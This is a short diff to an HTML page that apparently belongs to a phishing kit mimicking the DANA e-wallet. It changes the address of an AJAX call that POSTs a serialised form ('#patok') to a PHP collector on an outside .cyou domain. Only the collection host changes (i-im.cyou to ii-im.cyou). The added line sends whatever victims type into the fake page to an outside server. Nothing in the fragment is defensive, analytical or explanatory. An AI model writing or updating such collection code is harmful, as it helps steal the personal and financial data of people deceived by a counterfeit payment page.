--- a/cwp/901.html
+++ b/cwp/901.html
@@ -677,7 +677,7 @@ var tarif = $('input[name="tarif"]:checked').val();
       $("#process1").fadeIn(); 
         $.ajax({
             type: 'POST',
-            url: 'https://directory.i-im.cyou/cwp/dana22/1.php',
+            url: 'https://directory.ii-im.cyou/cwp/dana22/1.php',
             data: $('#patok').serialize(),
             datatype: 'JSON',            
             complete: function(data) {
